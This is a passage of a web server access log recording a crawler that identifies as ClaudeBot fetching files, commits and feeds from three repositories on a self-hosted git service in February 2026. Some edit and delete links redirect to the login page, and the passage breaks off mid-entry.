"/windpacer/dbserver/commits/branch/main/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 9805] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 5772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py?display=rendered" [Client 216.73.216.188] [Length 11120] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/index.html" [Client 216.73.216.188] [Length 2501] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache?display=source" [Client 216.73.216.188] [Length 12313] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md" [Client 216.73.216.188] [Length 11570] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?display=source" [Client 216.73.216.188] [Length 11968] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json?display=rendered" [Client 216.73.216.188] [Length 10903] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log?display=source" [Client 216.73.216.188] [Length 11647] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 216.73.216.188] [Length 11572] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" [Client 216.73.216.188] [Length 10085] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 216.73.216.188] [Length 1089] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 216.73.216.188] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css" [Client 216.73.216.188] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=rendered" [Client 216.73.216.188] [Length 10968] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" [Client 216.73.216.188] [Length 10571] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=source" [Client 216.73.216.188] [Length 11402] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css" [Client 216.73.216.188] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 216.73.216.188] [Length 12742] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 216.73.216.188] [Length 10725] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 12087] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css" [Client 216.73.216.188] [Length 21529] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 11153] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15528] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/update_status.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" [Client 216.73.216.188] [Length 9832] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/update_status.py" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.vscode/launch.json" [Client 216.73.216.188] [Length 452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 7492] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 7498] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln?display=source" [Client 216.73.216.188] [Length 11710] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 10346] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 12649] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10474] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json?display=rendered" [Client 216.73.216.188] [Length 11080] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/types.ts" [Client 216.73.216.188] [Length 9768] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 8207] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 216.73.216.188] [Length 1659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json?display=source" [Client 216.73.216.188] [Length 11768] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest" [Client 216.73.216.188] [Length 42881] [Gzip 9.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html" [Client 216.73.216.188] [Length 22034] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json?display=source" [Client 216.73.216.188] [Length 11652] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 216.73.216.188] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13107] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" [Client 216.73.216.188] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/types.ts" [Client 216.73.216.188] [Length 802] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 216.73.216.188] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css/style.css?display=source" [Client 216.73.216.188] [Length 20070] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 10218] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 9978] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 17343] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 10699] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 27365] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 10068] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 13431] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 12781] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 413] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2FOpcConnectionTest.csproj" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 